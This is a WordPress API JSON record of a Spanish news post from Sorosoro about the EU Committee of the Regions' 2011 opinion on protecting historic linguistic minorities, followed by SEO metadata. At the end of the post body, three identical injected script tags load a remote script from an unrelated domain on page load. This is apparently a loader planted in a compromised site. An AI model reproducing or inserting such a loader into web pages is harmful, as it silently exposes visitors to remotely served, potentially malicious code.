{"id":57715,"date":"2011-09-23T10:28:38","date_gmt":"2011-09-23T08:28:38","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=57715"},"modified":"2025-10-21T22:22:26","modified_gmt":"2025-10-21T20:22:26","slug":"2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/","title":{"rendered":"2 de setiembre de 2011: publicaci\u00f3n en el <i>Diario Oficial de la Uni\u00f3n Europea<\/i> la opini\u00f3n del Comit\u00e9 de las Regiones sobre \u00abLa protecci\u00f3n y el desarrollo de las minor\u00edas ling\u00fc\u00edsticas hist\u00f3ricas en el marco del Tratado de Lisboa\u00bb"},"content":{"rendered":"<p style=\"text-align: justify;\">Para el que no conoce bien los misterios de las instancias europeas, no es in\u00fatil  precisar aqu\u00ed qu\u00e9 es el <strong>Comit\u00e9 de las regiones<\/strong>: el CDR es la asamblea de los representantes locales y regionales de la Uni\u00f3n Europea que hace escuchar la voz de las colectividades territoriales en el seno de la Uni\u00f3n. Creado el <strong>9 de marzo de 1994<\/strong> seguido al <strong>Tratado de Maastricht<\/strong>, ha considerado reducir la fosa entre los ciudadanos y las instancias dirigentes europeas que asocian los elegidos locales en la toma de decisiones. Una iniciativa suma toda l\u00f3gica cuando se sabe que aproximadamente tres cuartos  de la legislaci\u00f3n comunitaria son puestas en marcha al nivel local o regional\u2026<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Compuesta de 344 miembros nominados por los diferentes gobiernos europeos para  5 a\u00f1os renovables, el CDR debe ser consultado para toda decisi\u00f3n al tener las repercusiones en el nivel local en los dominios siguientes: cohesi\u00f3n econ\u00f3mica y social, salud, educaci\u00f3n y cultura, medio ambiente, formaci\u00f3n profesional, transportes.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">El comit\u00e9 ha emitido pues el <strong>30 de junio<\/strong> \u00faltimo un <strong>dictamen <\/strong><strong>sobre \u00ab\u00a0la protecci\u00f3n y el desarrollo de las minor\u00edas ling\u00fc\u00edsticas hist\u00f3ricas en el marco del Tratado de Lisboa\u00bb<\/strong>, publicado en el <em>Diario Oficial de la Uni\u00f3n Europea<\/em> este 2 de setiembre.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">En una serie de apartados, el documento subraya la importancia de las minor\u00edas hist\u00f3ricas dentro de la Uni\u00f3n, su impacto positivo desde un punto de vista social y cultural, en general; sobre las personas y su comunidad de pertenencia, en particular, y la sensibilidad creciente de las poblaciones europeas sobre estos asuntos.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">En el lugar de las observaciones negativas, el CDR nota que un estudio realizado por el Parlamento europeo en 2008 ha hecho aparecer una reducci\u00f3n de los recursos financieros destinados para sostener la diversidad ling\u00fc\u00edstica, paralelamente al aumento del n\u00famero de lenguas de la Uni\u00f3n.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">El comit\u00e9 por consecuencia recomienda una serie de acciones:<\/p>\n<p style=\"text-align: justify;\">&#8211; <strong>desarrollo de la ense\u00f1anza de lenguas<\/strong>, especialmente de la minoritarias o regionales, con la ayuda de material y de los \u00fatiles tales como la formaci\u00f3n de profesores;<\/p>\n<p style=\"text-align: justify;\">&#8211; <strong>promoci\u00f3n de la utilizaci\u00f3n de estas lenguas<\/strong> con los contactos directos entre las instituciones europeas y los ciudadanos;<\/p>\n<p style=\"text-align: justify;\">&#8211; <strong>campa\u00f1as de informaci\u00f3n<\/strong> que apuntan a hacer conocer los derechos de las minor\u00edas ling\u00fc\u00edsticas;<\/p>\n<p style=\"text-align: justify;\">&#8211; <strong>integraci\u00f3n de las lenguas minoritarias o regionales en las pol\u00edticas, programas y prioridades transversales de la Uni\u00f3n<\/strong>, en particular en los sectores de lo audiovisual, de la educaci\u00f3n, de la cultura y del aprendizaje de las lenguas, as\u00ed como en las pol\u00edticas de cooperaci\u00f3n territorial, de desarrollo regional, de turismo y de los intercambios ente j\u00f3venes.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Y el aviso concluye  deseando que la Comisi\u00f3n y el Consejo europeo tomen m\u00e1s conciencia de la necesidad de disponer de una pol\u00edtica a favor de las minor\u00edas ling\u00fc\u00edsticas, financiadas de una manera adaptada y apoy\u00e1ndose sobre una base jur\u00eddica consolidada en un esp\u00edritu de valorizaci\u00f3n de las comunidades ling\u00fc\u00edsticas hist\u00f3ricas, al saber cuanto puede contribuir el reconocimiento de la herencia cultural a la existencia pac\u00edfica y al enriquecimiento de la identidad europea.<\/p>\n<p style=\"text-align: justify;\">Nosotros, por supuesto, solo podemos aplaudir y\u2026 lamentar que el Comit\u00e9 de las regiones solo sea un \u00f3rgano consultivo!!<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><a href=\"http:\/\/eur-lex.europa.eu\/LexUriServ\/LexUriServ.do?uri=OJ:C:2011:259:0031:0033:ES:PDF\" target=\"_blank\">Para leer el dictamen completo<\/a><\/p>\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Para el que no conoce bien los misterios de las instancias europeas, no es in\u00fatil precisar aqu\u00ed qu\u00e9 es el Comit\u00e9 de las regiones: el CDR es la asamblea de los representantes locales y regionales de la Uni\u00f3n Europea que hace escuchar la voz de las colectividades territoriales en el seno de la Uni\u00f3n. Creado [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-57715","post","type-post","status-publish","format-standard","hentry","category-noticias"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>2 de setiembre de 2011: publicaci\u00f3n en el Diario Oficial de la Uni\u00f3n Europea la opini\u00f3n del Comit\u00e9 de las Regiones sobre \u00abLa protecci\u00f3n y el desarrollo de las minor\u00edas ling\u00fc\u00edsticas hist\u00f3ricas en el marco del Tratado de Lisboa\u00bb - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"2 de setiembre de 2011: publicaci\u00f3n en el Diario Oficial de la Uni\u00f3n Europea la opini\u00f3n del Comit\u00e9 de las Regiones sobre \u00abLa protecci\u00f3n y el desarrollo de las minor\u00edas ling\u00fc\u00edsticas hist\u00f3ricas en el marco del Tratado de Lisboa\u00bb - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"Para el que no conoce bien los misterios de las instancias europeas, no es in\u00fatil precisar aqu\u00ed qu\u00e9 es el Comit\u00e9 de las regiones: el CDR es la asamblea de los representantes locales y regionales de la Uni\u00f3n Europea que hace escuchar la voz de las colectividades territoriales en el seno de la Uni\u00f3n. Creado [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-09-23T08:28:38+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:22:26+00:00\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"2 de setiembre de 2011: publicaci\u00f3n en el Diario Oficial de la Uni\u00f3n Europea la opini\u00f3n del Comit\u00e9 de las Regiones sobre \u00abLa protecci\u00f3n y el desarrollo de las minor\u00edas ling\u00fc\u00edsticas hist\u00f3ricas en el marco del Tratado de Lisboa\u00bb\",\"datePublished\":\"2011-09-23T08:28:38+00:00\",\"dateModified\":\"2025-10-21T20:22:26+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/\"},\"wordCount\":613,\"articleSection\":[\"Noticias sobre los idiomas en peligro\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/\",\"name\":\"2 de setiembre de 2011: publicaci\u00f3n en el Diario Oficial de la Uni\u00f3n Europea la opini\u00f3n del Comit\u00e9 de las Regiones sobre \u00abLa protecci\u00f3n y el desarrollo de las minor\u00edas ling\u00fc\u00edsticas hist\u00f3ricas en el marco del Tratado de Lisboa\u00bb - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"datePublished\":\"2011-09-23T08:28:38+00:00\",\"dateModified\":\"2025-10-21T20:22:26+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"2 de setiembre de 2011: publicaci\u00f3n en el Diario Oficial de la Uni\u00f3n Europea la opini\u00f3n del Comit\u00e9 de las Regiones sobre \u00abLa protecci\u00f3n y el desarrollo de las minor\u00edas ling\u00fc\u00edsticas hist\u00f3ricas en el marco del Tratado de Lisboa\u00bb\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"2 de setiembre de 2011: publicaci\u00f3n en el Diario Oficial de la Uni\u00f3n Europea la opini\u00f3n del Comit\u00e9 de las Regiones sobre \u00abLa protecci\u00f3n y el desarrollo de las minor\u00edas ling\u00fc\u00edsticas hist\u00f3ricas en el marco del Tratado de Lisboa\u00bb - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/","og_locale":"es_ES","og_type":"article","og_title":"2 de setiembre de 2011: publicaci\u00f3n en el Diario Oficial de la Uni\u00f3n Europea la opini\u00f3n del Comit\u00e9 de las Regiones sobre \u00abLa protecci\u00f3n y el desarrollo de las minor\u00edas ling\u00fc\u00edsticas hist\u00f3ricas en el marco del Tratado de Lisboa\u00bb - Sorosoro","og_description":"Para el que no conoce bien los misterios de las instancias europeas, no es in\u00fatil precisar aqu\u00ed qu\u00e9 es el Comit\u00e9 de las regiones: el CDR es la asamblea de los representantes locales y regionales de la Uni\u00f3n Europea que hace escuchar la voz de las colectividades territoriales en el seno de la Uni\u00f3n. Creado [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/","og_site_name":"Sorosoro","article_published_time":"2011-09-23T08:28:38+00:00","article_modified_time":"2025-10-21T20:22:26+00:00","author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Michel.Lemee","Tiempo de lectura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"2 de setiembre de 2011: publicaci\u00f3n en el Diario Oficial de la Uni\u00f3n Europea la opini\u00f3n del Comit\u00e9 de las Regiones sobre \u00abLa protecci\u00f3n y el desarrollo de las minor\u00edas ling\u00fc\u00edsticas hist\u00f3ricas en el marco del Tratado de Lisboa\u00bb","datePublished":"2011-09-23T08:28:38+00:00","dateModified":"2025-10-21T20:22:26+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/"},"wordCount":613,"articleSection":["Noticias sobre los idiomas en peligro"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/","url":"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/","name":"2 de setiembre de 2011: publicaci\u00f3n en el Diario Oficial de la Uni\u00f3n Europea la opini\u00f3n del Comit\u00e9 de las Regiones sobre \u00abLa protecci\u00f3n y el desarrollo de las minor\u00edas ling\u00fc\u00edsticas hist\u00f3ricas en el marco del Tratado de Lisboa\u00bb - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"datePublished":"2011-09-23T08:28:38+00:00","dateModified":"2025-10-21T20:22:26+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2011\/09\/2-de-setiembre-de-2011-publicacion-en-el-diario-oficial-de-la-union-europea-la-opinion-del-comite-de-las-regiones-sobre-la-proteccion-y-el-desarrollo-de-las-minorias-linguisticas-historicas\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"2 de setiembre de 2011: publicaci\u00f3n en el Diario Oficial de la Uni\u00f3n Europea la opini\u00f3n del Comit\u00e9 de las Regiones sobre \u00abLa protecci\u00f3n y el desarrollo de las minor\u00edas ling\u00fc\u00edsticas hist\u00f3ricas en el marco del Tratado de Lisboa\u00bb"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/57715","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=57715"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/57715\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=57715"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=57715"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=57715"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}